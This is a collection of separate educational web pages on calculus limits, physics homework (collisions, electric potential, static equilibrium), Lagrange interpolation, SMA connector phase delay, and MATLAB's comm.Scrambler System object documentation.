• If $p = 1, 2, 3, \ldots\text{,}$ then the domain of $f(x) = x^p$ is the set of all real numbers, and as $x \to \infty\text{,}$ $f(x) \to \infty\text{.}$ For the limit as $x \to -\infty\text{,}$ it matters whether $p$ is even or odd: if $p$ is even, $f(x) \to \infty$ as $x \to -\infty\text{;}$ if $p$ is odd, $f(x) \to -\infty$ as $x \to -\infty\text{.}$ Informally, all power functions of form $f(x) = x^p$ where $p$ is a positive even number are “U-shaped”, while all power functions of form $f(x) = x^p$ where $p$ is a positive odd number are “chair-shaped”. • If $p = -1, -2, -3, \ldots\text{,}$ then the domain of $f(x) = x^p$ is the set of all real numbers except $x=0\text{,}$ and as $x \to \pm \infty\text{,}$ $f(x) \to 0\text{.}$ This means that each such power function with a negative whole number exponent has a horizontal asymptote of $y = 0\text{.}$ Regardless of the value of $p$ ($p = -1, -2, -3, \ldots$), $\lim_{x \to 0^+} f(x) = \infty\text{.}$ But when we approach $0$ from the negative side, it matters whether $p$ is even or odd: if $p$ is even, $f(x) \to \infty$ as $x \to 0^-\text{;}$ if $p$ is odd, $f(x) \to -\infty$ as $x \to 0^-\text{.}$ Informally, all power functions of form $f(x) = x^p$ where $p$ is a negative odd number look similar to $\frac{1}{x}\text{,}$ while all power functions of form $f(x) = x^p$ where $p$ is a negative even number look similar to $\frac{1}{x^2}\text{.}$ Because the domain of the natural logarithm function is only positive real numbers, it doesn't make sense to even consider this limit. Because the sine function neither increases without bound nor approaches a single value, but rather keeps oscillating through every value between $-1$ and $1$ repeatedly, the sine function does not have a limit as $x \to \infty\text{.}$ ### Exercises5.1.4Exercises ###### 4.
We've observed that several different familiar functions grow without bound as $x \to \infty\text{,}$ including $f(x) = \ln(x)\text{,}$ $g(x) = x^2\text{,}$ and $h(x) = e^x\text{.}$ In this exercise, we compare and contrast how these three functions grow. 1. Use a computational device to compute decimal expressions for $f(10)\text{,}$ $g(10)\text{,}$ and $h(10)\text{,}$ as well as $f(100)\text{,}$ $g(100)\text{,}$ and $h(100)\text{.}$ What do you observe? 2. For each of $f\text{,}$ $g\text{,}$ and $h\text{,}$ how large an input is needed in order to ensure that the function's output value is at least $10^{10}\text{?}$ What do these values tell us about how each function grows? 3. Consider the new function $r(x) = \frac{g(x)}{h(x)} = \frac{x^2}{e^x}\text{.}$ Compute $r(10)\text{,}$ $r(100)\text{,}$ and $r(1000)\text{.}$ What do the results suggest about the long-range behavior of $r\text{?}$ What is surprising about this, in light of the fact that both $x^2$ and $e^x$ grow without bound? ###### 5. Consider the familiar graph of $f(x) = \frac{1}{x}\text{,}$ which has a vertical asymptote at $x = 0$ and a horizontal asymptote at $y = 0\text{,}$ as pictured in Figure 5.1.8. In addition, consider the similarly-shaped function $g$ shown in Figure 5.1.9, which has vertical asymptote $x = -1$ and horizontal asymptote $y = -2\text{.}$ 1. How can we view $g$ as a transformation of $f\text{?}$ Explain, and state how $g$ can be expressed algebraically in terms of $f\text{.}$ 2. Find a formula for $g$ as a function of $x\text{.}$ What is the domain of $g\text{?}$ 3. Explain algebraically (using the form of $g$ from (b)) why $\lim_{x \to \infty} g(x) = -2$ and $\lim_{x \to -1^+} g(x) = \infty\text{.}$ 4. What if a function $h$ (again of a similar shape as $f$) has vertical asymptote $x = 5$ and horizontal asymptote $y = 10\text{?}$ What is a possible formula for $h(x)\text{?}$ 5.
Suppose that $r(x) = \frac{1}{x+35} - 27\text{.}$ Without using a graphing utility, how do you expect the graph of $r$ to appear? Does it have a horizontal asymptote? A vertical asymptote? What is its domain? ###### 6. Power functions can have powers that are not whole numbers. For instance, we can consider such functions as $f(x)=x^{2.4}\text{,}$ $g(x)=x^{2.5}\text{,}$ and $h(x)=x^{2.6}\text{.}$ 1. Compare and contrast the graphs of $f\text{,}$ $g\text{,}$ and $h\text{.}$ How are they similar? How are they different? (There is a lot you can discuss here.) 2. Observe that we can think of $f(x) = x^{2.4}$ as $f(x) = x^{24/10} = x^{12/5}\text{.}$ In addition, recall by exponent rules that we can also view $f$ as having the form $f(x) = \sqrt[5]{x^{12}}\text{.}$ Write $g$ and $h$ in similar forms, and explain why $g$ has a different domain than $f$ and $h\text{.}$ 3. How do the graphs of $f\text{,}$ $g\text{,}$ and $h$ compare to the graphs of $y = x^2$ and $y = x^3\text{?}$ Why are these natural functions to use for comparison? 4. Explore similar questions for the graphs of $p(x) = x^{-2.4}\text{,}$ $q(x) = x^{-2.5}\text{,}$ and $r(x) = x^{-2.6}\text{.}$
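The limit behavior of power functions summarized in this section is easy to check numerically. Here is a minimal sketch in plain Python (my own illustration, not part of the text's Desmos activities; the helper name `power` is of my choosing):

```python
# Numerically illustrate the power-function limits from this section:
#   x^p -> infinity as x -> infinity when p > 0,
#   x^p -> 0        as x -> infinity when p < 0.
def power(p):
    """Return the power function f(x) = x**p."""
    return lambda x: x ** p

f, g = power(2), power(-2)

for x in (10, 100, 1000):
    # f(x) grows without bound while g(x) shrinks toward 0
    print(f"x = {x:>4}:  x^2 = {f(x):>8}  x^-2 = {g(x):.2e}")

# Near x = 0 from the right, x^-2 increases without bound:
for x in (0.1, 0.01):
    print(f"x = {x}:  x^-2 = {g(x):.0f}")
```

Trying larger and larger inputs in a table like this is exactly the kind of evidence the limit notation $\lim_{x \to \infty} x^{-2} = 0$ summarizes.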
https://www.physicsforums.com/threads/bat-and-ball-collison.158586/
# Bat and ball collision A ball and bat, approaching one another each with the same speed of 1.7 m/s, collide. Find the speed of the ball after the collision. (Assume the mass of the bat is very much larger than the mass of the ball, a perfectly elastic collision, and no rotational motion). so i am going to use conservation of energy, and since it is an elastic collision, it will be kinetic energy .5m1v1i^2+.5m2v2i^2=.5m1v1f^2+.5m2v2f^2 since the mass of the bat is much larger than that of the ball, i am going to use v1i+v2i=v1f+v2f so, if the bat and ball are approaching each other at the same speed i am going to take the ball approaching the bat to be negative, so i have 1.7-1.7=v1f+v2f the answer isn't 0....so this is where i am stuck cristo Staff Emeritus since the mass of the bat is much larger than that of the ball, i am going to use v1i+v2i=v1f+v2f Could you explain this assumption please? i really don't know! i was just trying to go somewhere....can you help me? Homework Helper (Assume the mass of the bat is very much larger than the mass of the ball, a perfectly elastic collision, and no rotational motion). Does this mean that the collision can be treated like a 'ball vs. wall' collision? i don't know....but i was also thinking that the bat would be taken as 0 and the velocity of the ball could be 2(1.7) cristo Staff Emeritus congrats, radou. Seems like everyone's turning gold around here! (I know you're thinking; you just want more medals! :tongue2:) (sorry for the OT comment Rasine) Doc Al Mentor i don't know....but i was also thinking that the bat would be taken as 0 and the velocity of the ball could be 2(1.7) Actually, you are on the right track with this thinking. More precisely: In a frame in which the bat is at rest, the ball moves with speed 2x(1.7). In that frame, treating the bat as hugely massive, what's the rebound velocity of the ball? Then convert back to the original frame to find the ball's speed with respect to the ground.
Homework Helper i don't know....but i was also thinking that the bat would be taken as 0 and the velocity of the ball could be 2(1.7) Just to add, if you assume m2 >> m1, (where m2 is the mass of the bat), you can easily verify your result by simply using conservation of momentum, unless I'm missing something here. (I know you're thinking; you just want more medals! :tongue2:) Bingo. so if i do that using conservation of energy i will have 0+m2(2*1.7)=0+m2(2*1.7)....right? i am so confused
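For completeness, the standard 1-D elastic-collision result can be checked numerically. The sketch below is my own illustration, not from the thread; it uses the textbook final-velocity formulas from conservation of momentum and kinetic energy, with a large mass ratio standing in for "bat much heavier than ball":

```python
def elastic_final_velocities(m1, v1, m2, v2):
    """Final velocities after a 1-D perfectly elastic collision,
    derived from conservation of momentum and kinetic energy."""
    v1f = ((m1 - m2) * v1 + 2 * m2 * v2) / (m1 + m2)
    v2f = ((m2 - m1) * v2 + 2 * m1 * v1) / (m1 + m2)
    return v1f, v2f

# Ball at -1.7 m/s, bat at +1.7 m/s (they approach each other).
# A mass ratio of 10^6 approximates an infinitely heavy bat, in
# which limit v1f -> -v1 + 2*v2 = 1.7 + 3.4 = 5.1 m/s.
v_ball_f, v_bat_f = elastic_final_velocities(1.0, -1.7, 1e6, 1.7)
print(round(v_ball_f, 3))  # approximately 5.1
```

This agrees with Doc Al's frame-change hint: in the bat's rest frame the ball arrives at 3.4 m/s and rebounds at 3.4 m/s, and transforming back to the ground frame gives 3.4 + 1.7 = 5.1 m/s.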
https://site.kurtpan.pro/notes/polyinter.html
# Polynomial Interpolation# For a given set of $$k + 1$$ points $$\left(x_{j}, y_{j}\right)$$ with no two $$x_{j}$$ values equal, to find the polynomial of lowest degree that assumes at each value $$x_{j}$$ the corresponding value $$y_{j}$$. ## Lagrange interpolation polynomial# $L(x):=\sum_{j=0}^{k} y_{j} \ell_{j}(x)$ ### Lagrange basis polynomials:# $\begin{split} \ell_{j}(x):=\prod_{\substack{0 \leq m \leq k \\ m \neq j}} \frac{x-x_{m}}{x_{j}-x_{m}} \quad ,j\in [0,k] \end{split}$ Note that: $\forall(i \neq j): \ell_{j}\left(x_{i}\right)=0$ $\ell_{j}\left(x_{j}\right):=1$ It follows that $$y_{j} \ell_{j}\left(x_{j}\right)=y_{j}$$, $$L\left(x_{j}\right)=y_{j}$$
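The formulas above translate directly into code. Here is a small pure-Python sketch (the function names are my own choosing):

```python
def lagrange(points):
    """Return the Lagrange interpolation polynomial L(x) through
    the given (x_j, y_j) pairs, which must have distinct x_j."""
    def basis(j, x):
        # ell_j(x) = product over m != j of (x - x_m) / (x_j - x_m)
        x_j = points[j][0]
        prod = 1.0
        for m, (x_m, _) in enumerate(points):
            if m != j:
                prod *= (x - x_m) / (x_j - x_m)
        return prod

    # L(x) = sum_j y_j * ell_j(x)
    return lambda x: sum(y_j * basis(j, x) for j, (_, y_j) in enumerate(points))

# The unique polynomial of degree <= 2 through (0,0), (1,1), (2,4) is x^2:
L = lagrange([(0, 0), (1, 1), (2, 4)])
print(L(1.5))  # 2.25
```

By construction $\ell_j(x_i) = 0$ for $i \neq j$ and $\ell_j(x_j) = 1$, so evaluating `L` at any node returns the corresponding $y_j$ exactly.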
https://electronics.stackexchange.com/questions/153621/how-can-i-know-the-phase-shift-or-phase-delay-of-the-sma-connector-and-rf-port
# How can I know the phase shift or phase delay of the SMA connector and RF port? I am now doing a project to measure the phase difference in my circuit. Figure 1 is my circuit. My target is to know the phase difference between the output of the DAC and the input of the ADC. I already know the phase of the output of the DAC, the phase shift of the analogue circuit, and that the modulator has no phase shift. The output signals from the DAC are lower than 20 kHz. My questions are: what phase shift would the SMA connector cause normally? (The SMA connector is 5-1814400-1 from TE Connectivity.) And how about the RF port? What phase shift would it cause? Does anyone have any idea about my questions or about how I can solve the problems? (I will try my best to update any information needed.) Thank you very much! Figure 1. The cable between the SMA and RF port is about 30 cm long, but I can't find any more detail about it. The modulator and analogue circuit are connected through fibre and PD. The analogue circuit, SMA connector and MCU are on one PCB board. • Is the SMA connector part of the modulator or part of the MCU? What cables are connected between the MCU, the connector, and the modulator? – The Photon Feb 11 '15 at 5:15 • @ThePhoton: the SMA connector is part of the PCB board, and the board includes the MCU and the analogue circuit. About the cable, I don't know what kind it is. It is about 30 cm long. – billyzhao Feb 11 '15 at 5:56 • The 30 cm cable has a much bigger phase effect than the SMA connector. – The Photon Feb 11 '15 at 5:59 • The modulator also probably has more phase effect than a single connector (doesn't it have connectors itself?), so if you're neglecting its delay, you really shouldn't worry about this connector. – The Photon Feb 11 '15 at 6:01 • @ThePhoton: how serious would the phase effect caused by the cable be?
– billyzhao Feb 11 '15 at 6:03 At 20 kHz, the phase shift of the SMA connector is negligible. The length of the signal path is maybe 5 mm. The dielectric constant of the PTFE (Teflon) material in the SMA connector is about 2.0. So the delay through the connector is about 23 ps. That's about 3 microradians of phase delay at 20 kHz. Even at higher frequencies, the delay through the SMA connector is probably quite small compared to the delay through the cable that's connected to the connector, which you've said nothing about. If you were working at a higher frequency where 20 ps made a difference, then you'd have a problem. Because the delay induced by a connector like this depends on the footprint on the PCB where you mount it as well as the construction of the connector itself. And because the two sides of the connector aren't the same type of waveguide. The best way to determine the characteristics of the connector would probably be to build two additional "test coupons" onto your pcb. Each coupon would be a length of trace with a connector on each end. The two traces would be different lengths. By measuring the S-parameters of the two coupons with a network analyzer, you'd have enough information to cancel out the effect of the traces and determine the characteristics of the connector. • Thank you very much! But would the connector or the RF port introduce a low-pass effect due to the parasitic capacitance and resistance? I just don't know much about the material and the construction of the connector or RF port. – billyzhao Feb 11 '15 at 6:23 • It's probably about the same as the other things --- way too small to worry about at 20 kHz. To say more, you'd have to tell us something about it besides that it's a "rf port". – The Photon Feb 11 '15 at 6:26 • Sorry for that. I am just learning the construction of the RF port. So for now I can't tell any more about it. Anyway, thank you very much!
– billyzhao Feb 11 '15 at 6:35 I don't think either the SMA connector or RF port will introduce phase shifts because they are not filtering, amplifying or otherwise processing the signal in any way. They simply pass it along, like a wire. Therefore the phase shift caused by increasing the path length will be practically negligible, but let's calculate it anyway. Your minimum period is 1/20kHz = 50 us. If you assume your signal propagates at the speed of light, and your SMA connector adds ~2 cm to your path, then your signal will take approx 67 ps to travel through the connector. This is 1.333e-6 of your period or a phase shift of approximately 0.00048 degrees. And for signals with frequencies less than 10 kHz, the period will be longer and the phase shift will matter even less. I don't think you have much to worry about. Unless you use really long cables, the phase shift from the DAC output to the ADC input (not due to your analog circuit) will be negligible. • The cable is about 30cm long. So does it matter? And do you mean that RF port also would not introduce serious phase shift? – billyzhao Feb 11 '15 at 6:11
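The arithmetic in these answers is easy to reproduce. The sketch below is my own, assuming a simple TEM line completely filled with dielectric (which slightly overestimates the delay of a real connector or cable); it computes delay and phase shift from length, relative permittivity, and frequency:

```python
import math

C = 299_792_458.0  # speed of light in vacuum, m/s

def delay_and_phase(length_m, eps_r, freq_hz):
    """Propagation delay (s) and phase shift (rad) of a line of the
    given length filled with a dielectric of permittivity eps_r."""
    delay = length_m * math.sqrt(eps_r) / C
    return delay, 2 * math.pi * freq_hz * delay

# ~5 mm of PTFE-filled connector (eps_r ~ 2.0) at 20 kHz:
d_conn, p_conn = delay_and_phase(0.005, 2.0, 20e3)
# the 30 cm cable mentioned in the question, same assumptions:
d_cable, p_cable = delay_and_phase(0.30, 2.0, 20e3)

print(f"connector: {d_conn*1e12:.0f} ps, {p_conn*1e6:.1f} urad")
print(f"cable:     {d_cable*1e9:.2f} ns, {p_cable*1e6:.0f} urad")
```

Since delay scales linearly with length, the 30 cm cable contributes roughly 60 times the phase shift of the 5 mm connector — still a tiny fraction of a degree at 20 kHz.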
https://www.clutchprep.com/physics/practice-problems/94131/a-bag-of-cement-weighing-325-n-hangs-in-equilibrium-from-three-wires-as-suggeste
Equilibrium in 2D

# Problem: A bag of cement weighing Fg = 325 N hangs in equilibrium from three wires as shown in the figure. Two of the wires make angles θ1 = 60.0° and θ2 = 40.0° with the horizontal. Assuming the system is in equilibrium, find the tensions T1, T2, and T3 in the wires.

###### Expert Solution

We're asked for the tension in each of the wires supporting the bag of cement. This is a 2D equilibrium problem with multiple forces at different angles. As usual for equilibrium problems, we'll follow these steps: 1. Draw a free-body diagram for each point of interest. 2. Set up our equilibrium equations. 3. Solve for the target.

In two dimensions, we use the equilibrium equations in component form:

$$\sum F_x = 0, \qquad \sum F_y = 0$$

Anytime we're working with forces that aren't at 90° angles to each other, we'll also need the equations that convert magnitude-angle notation to components.

Magnitude: $|\vec{F}| = \sqrt{F_x^2 + F_y^2}$

Angle: $\theta = \tan^{-1}\left|\frac{F_y}{F_x}\right|$

Components of a force: $F_x = |\vec{F}|\cos\theta$, $F_y = |\vec{F}|\sin\theta$
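Carrying the component equations through to numbers (a sketch of the algebra using Python's `math` module; variable names are my own):

```python
import math

Fg = 325.0                  # weight of the bag, N
th1 = math.radians(60.0)    # angle of wire 1 with the horizontal
th2 = math.radians(40.0)    # angle of wire 2 with the horizontal

# The vertical wire simply carries the bag's weight:
T3 = Fg

# At the knot:  sum Fx = 0  ->  T2*cos(th2) - T1*cos(th1) = 0
#               sum Fy = 0  ->  T1*sin(th1) + T2*sin(th2) - T3 = 0
# Substituting T1 = T2*cos(th2)/cos(th1) into the second equation:
T2 = T3 / (math.cos(th2) * math.tan(th1) + math.sin(th2))
T1 = T2 * math.cos(th2) / math.cos(th1)

print(f"T1 = {T1:.0f} N, T2 = {T2:.0f} N, T3 = {T3:.0f} N")
# -> T1 = 253 N, T2 = 165 N, T3 = 325 N
```

Note that T1 > T2: the steeper wire carries more of the load, and both horizontal components cancel exactly, as the ΣFx equation requires.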
http://physics.stackexchange.com/tags/models/hot
Tag Info 49 You are right, the planetary model of the atom does not make sense when one considers the electromagnetic forces involved. The electron in an orbit is accelerating continuously and would thus radiate away its energy and fall into the nucleus. One of the reasons for "inventing" quantum mechanics was exactly this conundrum. The Bohr model was proposed to ... 30 I can tell you why I don't believe in it. I think my reasons are different from most physicists' reasons, however. Regular quantum mechanics implies the existence of quantum computation. If you believe in the difficulty of factoring (and a number of other classical problems), then a deterministic underpinning for quantum mechanics would seem to imply one of ... 17 There is a great paper from the group of Howard Stone on this subject: Wetting of flexible fibre arrays (freely available here, but for some reason I am not allowed to link to it normally: http://211.144.68.84:9998/91keshi/Public/File/34/482-7386/pdf/nature10779.pdf) They specifically study when 2 closely positioned parallel fibers (i.e. hairs) clump ... 15 Let us try to rewrite the equation in approximate form of finite differences: $$\frac{A(x,t+\Delta t)-A(x,t)}{\Delta t} = C_3\frac{A(x+h,t)+A(x-h,t)-2A(x,t)}{h^2} +$$ $$+ C_2 \frac{v(x+h,t)A(x+h,t)-v(x-h,t)A(x-h,t)}{2h} + C_1 A(x,t)+C_0$$ Where $\Delta t$ -- is a time step, and $h$ -- space step. The expression becomes your PDE, in the limit $\Delta t\to0, ... 14 This could have been a comment, but as it actually anwers the question asked in the title, I'll post it as such: As far as I can tell there's no rational reason to dismiss these models out of hand - it's just that quantum mechanics (QM) has set the bar awfully high: So far, there's no experimental evidence that QM is wrong, and no one has come up with a ... 12 There were many models overturned throughout history, I will list some of the most salient ones. 
I will ignore the ones that predate modern science, the most prominent one being the geocentric model of the solar system, and I will confine myself to wrong ideas that were scientifically accepted as probably true at some point in history. Phlogiston: This is ... 11 Theoretically, yes it should be possible to derive the boiling point of diatomic nitrogen from fundamental forces. In fact, you don't even need to involve the strong force or weak force (or the strong nuclear force, which is sort of different). The strong forces bind the quarks together into nucleons and the nucleons together into nuclei, but they have ... 11 There are thousands of such examples, it is basically all situations in condensed matter physics. You see a lot of regularities that have no explanation. Here's one of the most annoying ones for me: Moseley's law--- you can knock out one of the two electrons most tightly bound to a heavy atom (in the K-shell). This leaves a hole orbiting the nucleus. The ... 10 I can't see how a negatively charged electron can stay in "orbit" around a positively charged nucleus. Even if the electron actually orbits the nucleus, wouldn't that orbit eventually decay? Yes. What you've given is a proof that the classical, planetary model of the atom fails. I can't reconcile the rapidly moving electrons required by the ... 9 Actually a paper recently came out, and highlighted in Popular Science, discussing using fermionic field concepts to model crowd avoidance at Netflix. You can imagine that the same concept could be used to consider in any situation where there are large numbers of people competing for limited preferred items. Update Now that we have a few minutes, ... 9 [ text I had put here is moved to the original question, but I prefer not to erase the comments that were posted here. ] 9 Apologies in advance if the first part of this comes off a bit argumentative, but I think there is an important point about physical theory that should be made. 
This point is also implicit in David Zaslavsky's answer as well. Rant on effective theories: Actually trying to calculate macroscopic properties like "chemistry" from fundamental theories like QCD ...

**8** At present, the Navier-Stokes equations for the dynamics of water haven't yet been derived from microscopic principles.

**8** Check out Mark Smith's PhD thesis titled Cellular automata methods in mathematical physics, specifically Chapter 4: Lorentz Invariance in Cellular Automata. The conclusion part of the chapter: Symmetry is an important aspect of physical laws, and it is therefore desirable to identify analogous symmetry in CA rules. Furthermore, the most important ...

**7** Briefly, the Bohr planetary model doesn't really address these issues. Bohr, a genius, just asserted that the phenomena at the atomic level were a combination of stationarity while being in an orbit, and discrete quantum jumps between the orbits. It was a postulate that yielded some agreement with experiment and was very helpful for the future ...

**7** No. There is nothing wrong with perturbation theory, or with theories with known, restricted accuracy. The point of theory is to explain the results of observation from as simple an initial theoretical standpoint as possible. Therefore: Since experiment always has a finite uncertainty, one can only ask that theory match the experimental value within its ...

**7** This is what I think the first bit of the calculation does. Suppose you start with a spherical eye with a hole in it (e.g. the pupil in the human eye): The radius of the eye is $ER$ and the radius of the hole is $AR$, and with the length $DA$ these form a right angled triangle. Pythagoras' theorem tells us: $$DA^2 + AR^2 = ER^2$$ so $DA = \dots$

**5** In physics and engineering, we often abstract and idealize a physical problem to gain insight into the physics, e.g., infinite plane of charge, infinite line of charge, point charge, etc.
Now, it goes without saying that if these idealizations didn't represent good approximations of relevant physical systems, they wouldn't be used. With regards to your ...

**5** Short answer: that depends on your definition of sound theory. For instance, it is possible to find peer-reviewed papers considering such possibilities. The idea that antimatter can be gravitationally repulsed from ordinary matter is definitely not the most popular one. Nevertheless, some people do try to apply it in astrophysical context. Let us have a ...

**5** The treatment of electrons as waves has combined with spherical harmonics (below image) to form the foundation for a modern understanding of how electrons "orbit." Tweaks to the spherical harmonic differential equations yields the Schrodinger equation, which yields the accepted models of electron orbital structures: The only element for which the ...

**5** Here's my quantitative attempt at 4. and 1.: The Coandă effect here is the tendency of the airflow to adhere to the surface of the ball. This means that near the surface of the ball, the streamlines are curved with a radius of curvature approximately equal to the radius of the ball $R$; this curvature results in a pressure gradient just as it does in ...

**5** Classically emission is continuous and the electron would need to occupy an "in between" energy level for a while, and that is forbidden in Bohr's scheme, so the emission can't be allowed to happen. This doesn't really explain why it can't happen, but that's phenomenology for you: you keep lining up facts until your kludge (1) gets the right answer and ...

**5** General relativity is a classical theory. I will restate your dilemma as follows, since this is how Einstein stated it: We have an abstract manifold consisting of points, vectors that link nearby points, and a metric tensor that tells you the distance between nearby points. What makes these points physical? How can we tell point A apart from point B? Since ...

**5** No.
Notoriously, supersymmetric string theory has to be formulated in 10 dimensions in order to be consistent. Another example is supergravity, which can be formulated in a maximum of 11 dimensions, otherwise it predicts particles with spins higher than two.

**5** This is an example from hydrodynamics. When the effects of viscosity can be ignored (inviscid flow), a uniform incident flow can exert on immersed bodies only lift forces perpendicular to the asymptotic flow velocity. However, there exist an infinite number of solutions of the flow equations of motion satisfying the asymptotic conditions at infinity and the ...

**4** As an alternative to Christian Blatter's heat interpretation, $A$ might describe the concentration of particles adsorbed onto a one-dimensional substrate surface (or a two-dimensional one, where we ignore one of the dimensions). New particles are adsorbed at rate $C_0$ per unit length. Adsorbed particles detach from the surface at rate $-C_1$ per particle. ...

**4** There are many physical intuitions often presented in various texts on fluid dynamics. I won't mention those here. I will, however, mention that mathematically the passage from a particle point of view to a continuum point of view is still a largely un-resolved problem. (With suitable interpretation, this problem was already posed by Hilbert as his 6th of 23 ...)

**4** You can estimate that someone swimming in water has a Reynolds number of about $10^6$ - $10^7$; what counts is that this number is $\gg 1$. In that case, you're dealing with the drag equation: http://en.wikipedia.org/wiki/Drag_(physics). If we assume that our swimmer has the same power $P$ on the moon and on Jupiter, his velocity $v$ scales as $v \propto \dots$

**4** In cellular automata I do know there is explicit dependence on step/time. In quantum mechanics (and many other theories) it is natural to write local evolution with respect to time. On the contrary, in 'pure' relativity, time is not that different from position.
And thus there is no such natural interpretation like 'the next step is the next time'. ...

**4** Foundational discussions are indeed somewhat like discussions about religious convictions, as one cannot prove or disprove assumptions and approaches at the foundational level. Moreover, it is in the nature of discussions on the internet that one is likely to get responses mainly from those who either disagree strongly (the case here) or who can add ...
https://www.physicsforums.com/threads/electric-potentialfind-the-electric-potential-midway-between-the-two-charges.231429/
# Electric Potential: Find the electric potential midway between the two charges

**1. Homework Statement**

A charge $q = 3.87\times10^{9}$ coulombs is placed at the origin and a second charge equal to $-2q$ is placed on the x axis at the location $x = 1.5\,\mathrm{m}$. (a) Find the electric potential midway between the two charges. (b) The electric potential vanishes at some point between the two charges. Find the value of $x$ at this point.

**2. Homework Equations**

$U = kq_0q/r$, $U = kq/r$, $U = U_1 + U_2$

**3. The Attempt at a Solution**

(a) $U = (8.99\times10^{9})(3.87\times10^{-9})(-1.9\times10^{-9})/0.75 + (9\times10^{9})(-7.74\times10^{-9})(-1.9\times10^{-9})/0.75 = 8.2\times10^{10}$???????

(b) $0 = (8.99\times10^{9})(???)/r$

---

**Shooting Star (Homework Helper):** (b) If $x$ is the distance from the origin of the point where the sum of the potentials vanishes, then what is the distance of that point from the $2q$ charge? Just add the two potentials and equate to zero. The values of $q$ and $k$ need not be put in while solving.

**OP:** did i do (a) right

**alphysicist (Homework Helper):** [quoting the equations above] I think you might be confusing two equations. The electric potential energy between a pair of point charges is $$U = \frac{k q_1 q_2}{r}$$ The electric potential at a specified point due to a point charge, which is what you want in this problem, is $$V = \frac{kq}{r}$$ [quoting the attempt] For the electric potential of a point charge there is only a single charge in the formula, so it looks like you're calculating the electric potential energy instead of the electric potential (although I don't see in the problem where the charge $-1.9\times 10^{-9}$ came from).
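For reference, both parts can be checked with a short Python sketch. This assumes the charge in the statement is meant to be $3.87\times10^{-9}$ C (as the solution attempt suggests; the exponent in the statement looks like a typo), and note that the exact value of $q$ cancels in part (b):

```python
k = 8.99e9    # Coulomb constant, N m^2 / C^2
q = 3.87e-9   # assumed nanocoulomb magnitude, per the attempt
d = 1.5       # separation of the two charges, m

# (a) potential midway between q at x = 0 and -2q at x = d
r = d / 2.0
v_mid = k * q / r + k * (-2.0 * q) / r   # net = -k*q/r, a negative value

# (b) V = 0 between the charges: k*q/x = k*(2q)/(d - x)  =>  x = d/3
x_zero = d / 3.0
print(v_mid, x_zero)
```

So the zero of the potential sits a third of the way from the positive charge, independent of $q$.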
http://www.mathworks.com/help/comm/ref/comm.scrambler-class.html?requestedDomain=www.mathworks.com&nocookie=true
# comm.Scrambler System object

Package: comm

Scramble input signal

## Description

The `Scrambler` object scrambles a scalar or column vector input signal. To scramble the input signal:

1. Define and set up your scrambler object. See Construction.
2. Call `step` to scramble the input signal according to the properties of `comm.Scrambler`. The behavior of `step` is specific to each object in the toolbox.

Note: Starting in R2016b, instead of using the `step` method to perform the operation defined by the System object™, you can call the object with arguments, as if it were a function. For example, `y = step(obj,x)` and `y = obj(x)` perform equivalent operations.

## Construction

`H = comm.Scrambler` creates a scrambler System object, `H`. This object scrambles the input data using a linear feedback shift register that you specify with the Polynomial property.

`H = comm.Scrambler(Name,Value)` creates a scrambler object, `H`, with each specified property set to the specified value. You can specify additional name-value pair arguments in any order as (`Name1`,`Value1`,...,`NameN`,`ValueN`).

`H = comm.Scrambler(N,POLY,COND,Name,Value)` creates a scrambler object, `H`. This object has the `CalculationBase` property set to `N`, the `Polynomial` property set to `POLY`, the `InitialConditions` property set to `COND`, and the other specified properties set to the specified values.

## Properties

`CalculationBase`: Range of input data. Specify the calculation base as a positive, integer, scalar value. Set the calculation base property to one greater than the number of input values. The `step` method input and output integers are in the range [0, CalculationBase−1]. The default is `4`.
`Polynomial`: Linear feedback shift register connections. Specify the polynomial that determines the shift register feedback connections. The default is `'1+ z^-1 + z^-2 + z^-4'`. You can specify the generator polynomial as a character vector or as a numeric, binary vector that lists the coefficients of the polynomial in order of ascending powers of $z^{-1}$, where $p(z^{-1}) = 1 + p_1 z^{-1} + p_2 z^{-2} + \cdots$ is the generator polynomial. The first and last elements must be `1`. Alternatively, you can specify the generator polynomial as a numeric vector. This vector must contain the exponents of $z^{-1}$ for the nonzero terms of the polynomial, in order of ascending powers of $z^{-1}$. In this case, the first vector element must be `0`. For example, `'1+ z^-6 + z^-8'`, `[1 0 0 0 0 0 1 0 1]`, and `[0 -6 -8]` specify the same polynomial $p\left({z}^{-1}\right)=1+{z}^{-6}+{z}^{-8}$.

`InitialConditionsSource`: Source of initial conditions. Specify the source of the `InitialConditions` property as either `Property` or `Input port`. If set to `Input port`, the initial conditions are provided as an input argument to the `step` function. The default value is `Property`.

`InitialConditions`: Initial values of linear feedback shift register. Specify the initial values of the linear feedback shift register as an integer row vector with values in [0, CalculationBase−1]. The default is `[0 1 2 3]`. The length of this property vector must equal the order of the `Polynomial` property vector. This property is available when `InitialConditionsSource` is set to `Property`.

`ResetInputPort`: Scrambler state reset port. Specify the creation of an input port that is used to reset the state of the scrambler. If `ResetInputPort` is `true`, the scrambler is reset when a nonzero input argument is provided to the `step` function. The default value is `false`. This property is available when `InitialConditionsSource` is set to `Property`.
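To make the shift-register mechanics concrete outside MATLAB, here is a small Python sketch of one common base-N self-synchronizing scrambler/descrambler convention. The tap/feedback arithmetic below is an illustrative assumption and is not claimed to match the toolbox's implementation symbol-for-symbol; it only demonstrates how a feedback polynomial and initial register state drive the scrambling, and that matching parameters make the two directions invert each other.

```python
def scramble(data, taps, init, base, descramble=False):
    """Base-N self-synchronizing scrambler/descrambler sketch.

    taps[k] is the (assumed) coefficient of z^-(k+1); the register
    holds the most recent scrambled symbols, newest first.
    """
    reg = list(init)
    out = []
    for d in data:
        feedback = sum(t * r for t, r in zip(taps, reg)) % base
        y = (d - feedback) % base if descramble else (d + feedback) % base
        # both directions feed back the *scrambled* symbol: that is y
        # when scrambling, and the input d when descrambling
        reg = [d if descramble else y] + reg[:-1]
        out.append(y)
    return out

# quaternary symbols, polynomial 1 + z^-2 + z^-3, register seed [1, 2, 0]
data = [3, 1, 0, 2, 3]
coded = scramble(data, [0, 1, 1], [1, 2, 0], 4)
decoded = scramble(coded, [0, 1, 1], [1, 2, 0], 4, descramble=True)
# decoded == data
```

Because the descrambler reinserts its own *input* (the scrambled symbols) into the register, both registers stay synchronized and the round trip is exact whenever taps and initial conditions agree.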
## Methods

- `clone` — Create scrambler object with same property values
- `getNumInputs` — Number of expected inputs to step method
- `getNumOutputs` — Number of outputs from step method
- `isLocked` — Locked status for input attributes and nontunable properties
- `release` — Allow property value and input characteristics changes
- `reset` — Reset states of scrambler object
- `step` — Scramble input signal

## Examples

